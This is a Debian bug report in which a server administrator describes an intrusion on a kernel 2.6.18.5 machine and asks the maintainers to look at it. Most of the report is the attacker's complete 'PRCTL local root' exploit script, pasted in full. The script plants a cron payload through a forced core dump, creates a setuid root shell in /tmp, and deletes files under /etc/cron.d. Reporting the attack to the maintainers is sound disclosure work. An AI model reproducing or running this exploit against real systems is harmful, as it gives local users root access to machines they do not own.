Bug#458251: prctl exploit works on kernel 2.6.18.5
Package: linux-image
Version: 2.6.18.5
Tags: security
Hello.
I'm running debian etch server. kernel 2.6.18.5, libc6_2.3.6.ds1-13etch2
updated by aptitude yesterday.
Today my server was attacked. Attacker logged in as non privileged
user "test".(password was brutforced). He used prctl local root exploit
(code below).
And it works! file "core" was dumped at folder /etc/cron.d/
The only happiness is that cron did not run it. Error in syslog:
cron[2379]: Error: bad minute; while reading /etc/cron.d/core
I tried to find out this exploit at google and find that it was affected to
kernels 2.6.13-2.6.17.4. from kernel 2.6.17.4 it should be fixed. But looks
like not....
Please let me know if you need resulted "core" file. I have isolated copy of
all files created by attacker.
Below is attacker script source:
#!/bin/sh
#
# PRCTL local root exp By: Sunix
# + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp
cat > /tmp/getsuid.c << __EOF__
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char
*payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n*
* * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ;
rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__
cat > /tmp/s.c << __EOF__
#include<stdio.h>
main(void)
{
setgid(0);
setuid(0);
system("/bin/sh");
system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/*");
return 0;
}
__EOF__
echo "wait aprox 4 min to get sh"
cd /tmp
cc -o s s.c
cc -o getsuid getsuid.c
./getsuid
./s
rm -rf getsuid*
rm -rf s.c
rm -rf prctl.sh
--
Regards, Lex
Reply to: